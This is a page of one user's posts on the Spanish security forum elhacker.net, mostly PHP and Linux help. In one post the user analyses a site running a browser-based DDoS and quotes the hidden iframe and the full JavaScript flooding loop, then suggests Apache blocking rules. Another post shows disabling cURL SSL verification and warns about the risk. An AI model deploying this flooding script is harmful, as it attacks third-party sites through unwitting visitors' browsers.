elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 ... 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 [456] 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 ... 768
4551  Seguridad Informática / Seguridad / Re: Ataques de Denegación en: 13 Enero 2014, 09:18 am
Efectivamente esa pagina esta llevando acabo un DDOS.
Código
  1. view-source:http://boombang.me/esp/cliente.php
Código
  1. <iframe src='ddosputo.php' height='0' width='0' style="borders: none; display: none"></iframe>

La cual tiene:

Código
  1. <meta http-equiv="refresh" content="60;URL=ddosputo.php">
Código
  1. <script type="text/javascript">
  2. 			function random() {
  3. 				var count = 0;
  4. 				var result = "";
  5. 				var length = Math.Floor(Math.Random() * 100);
  6. 				var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
  7.  
  8. 				for (var i = 0; i < length; i++) {
  9. 					var num = Math.Floor(Math.Random() * chars.length);
  10. 					result = result + chars.substring(num, num + 1);
  11. 				}
  12.  
  13. 				return result;
  14. 			}
  15.  
  16. 			(function () { 
  17. 				var fireInterval; 
  18. 				var requestsHT = {};
  19. 				var isFiring = true;
  20. 				var targetURL = "http://boomkong.tk"
  21. 				var requestedCtr = 0, succeededCtr = 0, failedCtr = 0;
  22.  
  23. 				var makeHttpRequest = function () {
  24.  
  25. 				if (requestedCtr > failedCtr + succeededCtr + 1000) {  return; };
  26.  
  27. 				var rID = Number(new Date()); var img = new Image();
  28. 				img.onerror = function () { onFail(rID); };
  29. 				img.onabort = function () { onFail(rID); };
  30. 				img.onload = function () { onSuccess(rID); };
  31.  
  32. 				img.setAttribute("src", targetURL + "?id=" + rID + "&msg=robandocreditosokase-lol");
  33. 				requestsHT[rID] = img;  onRequest(rID);
  34. 				};
  35.  
  36. 				var onRequest = function (rID) { requestedCtr++; };
  37. 				var onComplete = function (rID) { delete requestsHT[rID]; };
  38. 				var onFail = function (rID) { succeededCtr++; delete requestsHT[rID]; };
  39. 				var onSuccess = function (rID) { succeededCtr++; delete requestsHT[rID]; };
  40.  
  41. 				isFiring = true; 
  42. 				fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(200) | 0));
  43. 			})();
  44. 		</script>

Pero no parece que estén atacando a tu foro.. o al menos no en este momento.


Defenderte de ese ataque.. no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).

Al fin y al cabo lo que hacen es crear imágenes (miles xD) con ruta el sitio al que atacan.

Slaudos
4552  Sistemas Operativos / GNU/Linux / Re: ¿Consulta que sistema de linux es el mas estable y agarre jdownloader 2? en: 13 Enero 2014, 03:54 am
gNewSense igual funciona porque incluye varios interpretes java (jdownloader es java) libres.. pero igual no. Es que entras en un conflicto bastante gordo.

Esas distros estan libres de cualquier software/firmware privativo. Java es privativo.

Saludos
4553  Seguridad Informática / Seguridad / Re: Rootkit en mi pc. ¿Que hago? en: 12 Enero 2014, 21:33 pm
Malwarebytes tienen un anti-rootkit en fase beta.
http://www.malwarebytes.org/antirootkit/

Saludos
4554  Programación / PHP / Re: validar una fecha que no se pase del dia actual en: 12 Enero 2014, 20:57 pm
¿Que tienes hecho?

Saludos
4555  Programación / PHP / Re: Error en Mysql en sistema de puntos php en: 11 Enero 2014, 04:01 am
Cita de: engelx en 10 Enero 2014, 03:30 am
drvy  era bromeando :P no aceptas un chistesito! jejeje

incluso mira que la que el está usando era obsoleta en 5.3.0 XD

Yo es que esas cosas no me las tomo a broma... luego cuando los hosts se pasen a 5.5 inundaran el foro a preguntas de porque no funciona mysql_*..

En fin..  :xD

Saludos
4556  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Qué significa este mensaje de aviso? en: 11 Enero 2014, 01:01 am
El tema ha sido borrado y esta en la Papelera. La papelera es accesible solo a ciertos rangos (colaboradores, mod global, coadmin y admin) y por tanto los usuarios no pueden ver los posts que haya ahí (están fuera de sus limites).

Para dudas sobre el foro te recomiendo

Sugerencias y dudas sobre el Foro
http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/

Que es donde se responden este tipo de preguntas.

Saludos
4557  Programación / PHP / Re: Error en Mysql en sistema de puntos php en: 10 Enero 2014, 03:21 am
Citar
no seas dramático! no está obsoleta... aun no sale el PHP 5.5.0 apeeeenas en diciembre salio e. 5.4.23!  ;D

De dramático nada, PDO esta desde 5.1 y mysqli desde 5.0 .. son mejores y están siendo mejoradas.. mysql ha pasado a estar en fase de mantenimiento (no habrá mas mejoras solo mantenimiento). Y, PHP 5.5 ya esta mas que disponible para Win y Linux.. que los repositorios de las distros no estén actualizadas es otro problema :)



Saludos
4558  Programación / PHP / Re: Error en Mysql en sistema de puntos php en: 10 Enero 2014, 00:29 am
Como hay que decirlo...

NO UTILIZAR MYSQL, ESTA OBSOLETA. USAD MYSQLI o PDO.

Citar
This extension is deprecated as of PHP 5.5.0, and is not recommended for writing new code as it will be removed in the future. Instead, either the mysqli or PDO_MySQL
http://www.php.net/manual/en/intro.mysql.php

Saludos
4559  Programación / PHP / Re: cURL para HTTPS problemas con SSL en: 9 Enero 2014, 21:04 pm
Puedes desactivar la verificiacion SSL pero te expones a ataques MiTM...
Código
  1.  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

Lo suyo seria descargar una lista actualizada de certificados (ya que los que vienen con cURL estan mas que obsoletos (y por eso te tira el error)..

http://curl.haxx.se/ca/cacert.pem

Lo descargas, lo metes donde tu .php o en algún directorio relativo y pones
Código
  1. curl_setopt ($ch, CURLOPT_CAINFO, 'cacert.pem');

Saludos
4560  Sistemas Operativos / GNU/Linux / Re: Unas cuantas dudas sobre Ubuntu en: 8 Enero 2014, 00:59 am
Citar
Me gustaría hacer varias cosas, una de ellas es que solamente se atenué(oscurezca) la pantalla cuando este sin utilizarlo y sin estar reproduciendo ningún vídeo, ya que estaba reproduciendo un vídeo y de repente se atenúa la pantalla, me he quedado muy sorprendido al ver que hace algo así, ni que esta versión tuviera 8 años vaya...
En Windows cuando estoy viendo algún vídeo no se atenúa, ya que no es muy lógico estar moviendo el ratón y tocando el teclado mientras ves un vídeo en pantalla completa.

Ese es un problema bastante gordo que hay en gnu/linux y flash en general.. al parecer flash no tiene ningún control sobre el screenserver y hay que recurrir a scripts de terceros..
https://github.com/iye/lightsOn
Otras soluciones:
http://www.webupd8.org/2012/05/2-ways-to-temporarily-disable.html

Lo segundo lo que te ha dicho Aberroncho, pero te estas exponiendo a un riesgo muy grande.

Saludos
Páginas: 1 ... 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 [456] 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 ... 768
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines